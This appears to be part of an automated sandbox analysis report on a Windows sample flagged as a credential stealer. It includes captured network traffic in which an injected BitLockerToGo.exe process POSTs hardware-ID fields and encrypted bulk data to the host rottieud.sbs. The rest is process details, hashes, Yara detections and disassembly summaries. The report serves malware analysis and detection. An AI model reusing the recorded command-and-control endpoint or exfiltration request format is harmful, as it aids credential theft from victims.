6	192.168.2.4	62524	104.21.73.211	443	7812	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 08:27:28 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SYJ2CVSRLDMALM7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 573629 Host: rottieud.sbs
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: 2d 2d 53 59 4a 32 43 56 53 52 4c 44 4d 41 4c 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 53 59 4a 32 43 56 53 52 4c 44 4d 41 4c 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 59 4a 32 43 56 53 52 4c 44 4d 41 4c 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 62 65 78 0d 0a 2d 2d 53 59 4a 32 43 Data Ascii: --SYJ2CVSRLDMALM7Content-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--SYJ2CVSRLDMALM7Content-Disposition: form-data; name="pid"1--SYJ2CVSRLDMALM7Content-Disposition: form-data; name="lid"eSaxAu--webex--SYJ2C
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: d1 7e ce c2 28 c6 d7 d9 c7 e3 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d Data Ascii: ~(OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2\|B\|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: 4a c9 ad ee aa 2a 77 8f 7e 56 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 Data Ascii: Jw~V<.iQx;8%Z^[BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN\|xM*%T<_/5IIELX;"&#ysH {x
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: 77 df a2 5f a2 99 20 10 bd fb 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 Data Ascii: w_ ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: 74 39 38 16 58 04 dc 89 f4 12 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa Data Ascii: t98XMnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>h
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: 2a b9 36 eb 51 2f 2d 02 25 c7 e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 Data Ascii: 6Q/-%.VYxh.f:.@7W}TH[.!%'@tA&<\|<T\|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$\|wev^qPy{ohh"s:%PbUpacFG)*,
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: 6c d1 a1 b7 d2 c0 37 bd da 12 b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 Data Ascii: l7$x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:\|O/.`(#~B\|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t\|CI
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: 4c 1d 94 82 54 66 98 2b 2e b5 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 Data Ascii: LTf+._WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?\|.j@Tz8PhSIaW)]u^R<
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: 61 9d 5b 4b 46 c0 17 56 b3 00 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d Data Ascii: a[KFV~Rg}OET 4c-=c^}a;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]
2024-11-10 08:27:28 UTC	15331	OUT	Data Raw: d7 bb be 91 a8 f5 57 73 eb ed f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 Data Ascii: Wsh7#r<M7?g:gj%,Wtn{\|.I;{^'*U7?$mkPAc{`GHN\|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6
2024-11-10 08:27:30 UTC	1011	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 08:27:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=avuruod8qcfo7dl04ldsg45rph; expires=Thu, 06-Mar-2025 02:14:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjCZe6UF7LgxWFhHIkRQ72lGBCmcldWWZ2xAUJq76GhVtu4LdiaXMQEBG1Kfa0cSrCg2ZSYwlDB789y3oANeHtaw8IBqar4PEXqH6nAOG2vTx%2BH%2FbWS2WvlD0qZg5o8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e04a9e27b206b0d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=212&recv=611&lost=0&retrans=0&sent_bytes=2827&recv_bytes=576169&delivery_rate=2498705&cwnd=251&unsent_bytes=0&cid=35eaaa6c8e07aa1f&ts=1801&x=0"

Target ID:	0
Start time:	03:26:59
Start date:	10/11/2024
Path:	C:\Users\user\Desktop\gFCeeWNTvZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gFCeeWNTvZ.exe"
Imagebase:	0xa10000
File size:	48'627'712 bytes
MD5 hash:	F04F7352CBA3579FF18E50534F6A14D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:27:17
Start date:	10/11/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xd50000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1891820407.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.7%
Total number of Nodes:	1698
Total number of Limit Nodes:	33

Executed Functions

Function 64608848 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 378
windowregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 64608876
SystemParametersInfoW.USER32 ref: 6460889A
GetProcAddress.KERNEL32 ref: 646088D8
ShowWindow.USER32 ref: 64608EDC
RegisterDeviceNotificationW.USER32 ref: 64608F21
PeekMessageW.USER32 ref: 64608F56
TranslateMessage.USER32 ref: 64608F69
DispatchMessageW.USER32(00000000), ref: 64608F76

Strings

, xrefs: 64608EF5
$0cd, xrefs: 64608F93
0;cd, xrefs: 6460885F
<;cd, xrefs: 64608AE2

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Message$AddressCallbackDeviceDispatchDispatcherInfoNotificationParametersPeekProcRegisterShowSystemTranslateUserWindow
String ID: $$0cd$0;cd$<;cd
API String ID: 492125495-2933605525
Opcode ID: d6ccfd26f1ffe45069021f70fcd627825fc26292ea915f0df43bdb35d03f3396
Instruction ID: 1631ad54a60ab0754004a945e7f3dbe07b8806c8f3d5c1b253d8a438647a4c41
Opcode Fuzzy Hash: d6ccfd26f1ffe45069021f70fcd627825fc26292ea915f0df43bdb35d03f3396
Instruction Fuzzy Hash: 560233B050D380DFDB26DF66C98875ABBF4FB56708F00A81DE4898B650D7B58888CF56

Function 6460496F Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 330
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcspn.MSVCRT ref: 646049D8
strcspn.MSVCRT ref: 64604C2E
strcspn.MSVCRT ref: 64604C82
strlen.MSVCRT ref: 64604CD9
strncmp.MSVCRT ref: 64604CF1
strcspn.MSVCRT ref: 64604E3D
strspn.MSVCRT ref: 64604E55
strtoul.MSVCRT ref: 64604F5C

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Strings

,, xrefs: 64604C8C
,, xrefs: 64604C51

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: strcspn$callocstrcpystrlenstrncmpstrspnstrtoul
String ID: ,$,
API String ID: 1884079115-220654547
Opcode ID: 25bc4c535642e7489e7812ab0660e2ad26dbdeeb91398133799e6bb0e79760f3
Instruction ID: 4e2591ca80fda431e89cdfa17fb7706cfdf5ffbd0de9d582056cb6620bd4d30f
Opcode Fuzzy Hash: 25bc4c535642e7489e7812ab0660e2ad26dbdeeb91398133799e6bb0e79760f3
Instruction Fuzzy Hash: 06F14EB0D097698FDB25CF24CE807CABBF5EB66705F0095EAC448A7245E7719A88CF41

Function 6460C519 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 297
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 6460C5E4
CreateWindowExW.USER32 ref: 6460C63F
free.MSVCRT ref: 6460C657

Part of subcall function 6460A6A5: EnumDisplaySettingsExW.USER32 ref: 6460A6EE

Part of subcall function 6460A79F: EnumDisplaySettingsW.USER32 ref: 6460A7DC

SetPropW.USER32 ref: 6460C690

Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765

ChangeWindowMessageFilterEx.USER32 ref: 6460C6DA
ChangeWindowMessageFilterEx.USER32 ref: 6460C704
ChangeWindowMessageFilterEx.USER32 ref: 6460C72E
GetDpiForWindow.USER32(00000000), ref: 6460C81B
AdjustWindowRectEx.USER32(00000000,00000000), ref: 6460C85F

Part of subcall function 6460B89F: CreateRectRgn.GDI32(00000000), ref: 6460B90B
Part of subcall function 6460B89F: GetWindowLongW.USER32 ref: 6460B95B
Part of subcall function 6460B89F: SetWindowLongW.USER32 ref: 6460B97D
Part of subcall function 6460B89F: SetLayeredWindowAttributes.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6460B9A7
Part of subcall function 6460B89F: DeleteObject.GDI32 ref: 6460B9B3

GetWindowPlacement.USER32 ref: 6460C87E
SetWindowPlacement.USER32 ref: 6460C8A4
DragAcceptFiles.SHELL32 ref: 6460C8BD

Strings

,, xrefs: 6460C76F
I, xrefs: 6460C71D
`, xrefs: 6460C59F

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Window$ChangeConditionFilterMaskMessage$CreateDisplayEnumLongPlacementRectSettings$AcceptAdjustAttributesDeleteDragFilesHandleInfoLayeredModuleObjectPropVerifyVersionfree
String ID: ,$I$`
API String ID: 131436255-777141184
Opcode ID: 0cb9c5bf2eeb64f56a6cd0c7beb129aca32bfc4b4948cbd305c90c412df7d815
Instruction ID: 4fcba12949c450f94256104e9e972d34c8d011c993fabe472bf4f4fe60441ba9
Opcode Fuzzy Hash: 0cb9c5bf2eeb64f56a6cd0c7beb129aca32bfc4b4948cbd305c90c412df7d815
Instruction Fuzzy Hash: 9FD1B0B4A083059FEB04EFA9C68479EBBF4FF89704F00C829E8999B245D7759845CF52

Function 6460998C Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.MSVCRT ref: 64609A9E

Strings

Unknown XInput Device, xrefs: 64609AF3
XInput Drum Kit, xrefs: 64609AD3
XInput Guitar, xrefs: 64609AC9
Xbox Controller, xrefs: 64609AE6
XInput Flight Stick, xrefs: 64609AB5
XInput Arcade Stick, xrefs: 646099CA
XInput Wheel, xrefs: 64609AFD
Wireless Xbox Controller, xrefs: 64609AE1
XInput Dance Pad, xrefs: 64609ABF

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: sprintf
String ID: Unknown XInput Device$Wireless Xbox Controller$XInput Arcade Stick$XInput Dance Pad$XInput Drum Kit$XInput Flight Stick$XInput Guitar$XInput Wheel$Xbox Controller
API String ID: 590974362-1077793288
Opcode ID: d513b2141bc3ad312d71be5418f76d33285190a4b7cae771f26ec3d63cd6f96f
Instruction ID: 804f39a0cce51d99c337eb1727c2d52fc43592905ec737388b680bb4227ce87a
Opcode Fuzzy Hash: d513b2141bc3ad312d71be5418f76d33285190a4b7cae771f26ec3d63cd6f96f
Instruction Fuzzy Hash: 61313AB0A0C394DFD709AF69C68439ABFE2EB51B4CF05D82DE4949B284D775C488CB42

Function 6460BB1B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

